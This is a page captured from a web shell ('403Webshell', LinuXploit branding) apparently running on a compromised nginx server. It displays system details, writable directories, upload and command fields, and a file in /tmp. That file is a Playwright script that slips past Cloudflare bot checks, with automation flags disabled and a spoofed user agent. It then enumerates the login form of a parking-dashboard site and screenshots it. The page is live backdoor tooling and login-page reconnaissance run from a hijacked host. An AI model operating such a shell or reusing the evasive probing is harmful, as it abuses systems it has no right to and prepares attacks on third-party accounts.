403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/tmp/pl_probe.py
import sys
from playwright.sync_api import sync_playwright

URL="https://www.parkinglist.de/ParkingDashboard/login.xhtml"
with sync_playwright() as p:
    browser = p.chromium.launch(headless=True, args=["--no-sandbox","--disable-blink-features=AutomationControlled"])
    ctx = browser.new_context(
        user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        locale="de-DE", viewport={"width":1366,"height":900})
    page = ctx.new_page()
    page.goto(URL, wait_until="domcontentloaded", timeout=60000)
    # give Cloudflare challenge time to auto-solve
    for i in range(8):
        page.wait_for_timeout(4000)
        t = page.title()
        print(f"[{i}] title={t!r} url={page.url}")
        if "moment" not in t.lower():
            break
    print("=== final title:", page.title())
    # dump inputs
    inputs = page.eval_on_selector_all("input, button[type=submit]", "els=>els.map(e=>({tag:e.tagName,type:e.type,id:e.id,name:e.name,ph:e.placeholder||''}))")
    print("INPUTS:", inputs)
    forms = page.eval_on_selector_all("form", "els=>els.map(e=>({id:e.id,name:e.name,action:e.action}))")
    print("FORMS:", forms)
    page.screenshot(path="/tmp/pl_login_shot.png", full_page=True)
    browser.close()

Youez - 2016 - github.com/yon3zu
LinuXploit